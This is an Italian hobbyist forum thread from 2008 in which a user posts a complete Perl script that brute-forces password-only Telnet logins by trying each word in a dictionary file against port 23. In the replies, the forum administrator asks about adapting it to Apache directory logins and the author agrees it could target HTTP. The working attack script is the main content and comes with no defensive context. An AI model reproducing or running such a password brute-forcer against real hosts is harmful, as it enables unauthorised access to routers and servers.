Il Forum di Orebla.it

Benvenuto nella community di Orebla.it
Oggi è dom 16 feb, 2020 8:31 pm

Tutti gli orari sono UTC + 1 ora




Apri un nuovo argomento Rispondi all’argomento  [ 3 messaggi ] 
Autore Messaggio
 Oggetto del messaggio: [Perl] Telnet bruter
Messaggio da leggereInviato: ven 15 feb, 2008 10:15 am 
Non connesso
super-guru
super-guru
Avatar utente

Iscritto il: mar 28 dic, 2004 6:54 pm
Messaggi: 300
Località: Pisa
Questo semplicissimo script Perl effettua il brute force di un servizio Telnet che richiede una password (solo password, nessuna richiesta di utente). Come parametri richiede l'host su cui è in esecuzione il servizio e un file dizionario. L'esame della password inserita viene effettuato in un modo forse poco elegante ma di sicuro efficace (se il messaggio di risposta del server non contiene la stringa 'failed' allora la password è probabilmente esatta), ma si può personalizzare a seconda delle proprie esigenze e a seconda della stringa di risposta inviata dal server in caso di autenticazione fallita. Ho avuto modo di testarlo solo sul mio router, essendo l'unico ad avere il demone telnet in esecuzione, e funziona. Codice:

Codice:
#!/usr/bin/perl

use IO::Socket;

sub help  {
        die "Usage: telnet.pl <host> <dict>\n";
}

my $host=shift or help;
my $dict=shift or help;

open (IN,"< $dict") or die ("Unable to open dictionary file $dict\n");

while ($line=<IN>)  {
        my $sock = new IO::Socket::INET(
                "PeerAddr" => $host,
                "PeerPort" => 23,
                "Proto" => 'tcp',
        );

        die "Impossibile creare una connessione telnet\n" unless $sock;
        print $sock "$line\r\000";

        while (<$sock>)  {
                if (!($_ =~ /failed/i))  {
                        close($sock);
                        close(IN);
                        die "Password found -> $line\n"
                }
        }

        close($sock);
}

close(IN);

_________________
Immagine
Immagine


Top
 Profilo  
 
 Oggetto del messaggio: Re: [Perl] Telnet bruter
Messaggio da leggereInviato: dom 17 feb, 2008 11:18 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Si uno script semplice ma potente. Anni fa ne avevo fatto uno simile per "craccare" l'md5 tramite brute force. Poi l'ho abbandonato perchè superate le 4 lettere le possibilità di trovare la parola codificata era troppo bassa.

Questo script si potrebbe trasformare in un brute per i login di Apache delle directory protette??

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio: Re: [Perl] Telnet bruter
Messaggio da leggereInviato: dom 17 feb, 2008 9:02 pm 
Non connesso
super-guru
super-guru
Avatar utente

Iscritto il: mar 28 dic, 2004 6:54 pm
Messaggi: 300
Località: Pisa
Certo si potrebbe fare...semplicemente il brute invece di applicarlo a Telnet lo applichi al protocollo HTTP.

_________________
Immagine
Immagine


Top
 Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  [ 3 messaggi ] 

Tutti gli orari sono UTC + 1 ora


{ RELATED_TOPICS }
 Argomenti   Autore   Risposte   Visite    Ultimo messaggio 
Non ci sono nuovi messaggi in questo argomento. [Perl / C] Ip2Host

BlackLight

0

2274

sab 02 giu, 2007 2:39 pm

BlackLight Vedi ultimi messaggi

Non ci sono nuovi messaggi in questo argomento. [Perl] Algoritmo per il calcolo approssimato di PI GRECO

BlackLight

7

2961

mer 05 set, 2007 3:51 pm

BlackLight Vedi ultimi messaggi

 


Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite


Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi inviare allegati

Cerca per:
Vai a:  
cron
Powered by phpBB® Forum Software © phpBB Group
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010
phpBB SEO